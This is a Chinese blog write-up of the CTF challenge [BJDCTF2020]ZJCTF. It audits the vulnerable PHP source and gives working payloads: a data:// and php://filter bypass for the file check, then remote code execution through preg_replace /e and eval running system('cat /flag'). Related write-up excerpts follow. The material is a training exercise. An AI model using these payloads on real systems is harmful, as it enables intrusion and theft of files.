[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2025-01-05 09:54:57 发布
最新推荐文章于 2025-01-05 09:54:57 发布
阅读量440 收藏 6
点赞数
CC 4.0 BY-SA版权
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/116499680
本文探讨了一段PHP源码,分析了如何通过特定参数绕过限制并执行任意代码。当$text等于'Ihaveadream'时,代码会读取并显示指定文件。存在preg_replace函数的漏洞,允许在/e模式下执行任意函数。通过构造URL,可以触发getFlag()函数来获取敏感信息,如'flag'。博客重点讨论了PHP安全和命令注入风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

分析一下源码,首先要设置text变量通过get传参过去,然后获取text这个文件 文件内容要等与"I have a dream"才能够绕过第一个进入到下一步。

这里应该可以利用php伪协议将文件内容写进去然后自己就可以控制文件内容,从而进入下一步。

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

当然在这里还有一种方法,使用php://input 读取post中的内容,也可以获取到,next.php文件的内容。

 

将base64解密后,获取到next.php的源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

这里可以看到有一个危险的函数可以执行命令。当然这里不需要使用这个函数,preg_replace /e模式下可以执行任意函数。

/next.php?\S*=${getFlag()}&cmd=system('cat /flag');

可以获取到flag

[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 2222
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2552
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 284
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1935
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
BJDCTF2020 ZJCTF不过如此 1
最新发布
hddi1的博客
01-05 945
php伪协议 #利用伪协议 #filegetcomtent用phpinput绕过 #PHP对于函数调用的语法问题。
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 723
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2918
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
[BJDCTF2020]ZJCTF不过如此(preg_replace /e 模式下的代码漏洞问题)
xlcvv的博客
04-30 729
题目给了源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_ge...
[BJDCTF2020]ZJCTF不过如此 简单思路及做法
EC_Carrot的博客
12-07 959
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
审计练习12——[BJDCTF2020]ZJCTF不过如此
qq_43756333的博客
06-04 756
平台:buuoj.cn 打开靶机得源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&gt
[BUUCTF][BJDCTF2020]ZJCTF不过如此
cosmoslin的博客
01-24 789
考点 代码审计 命令执行 解题 打开环境 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值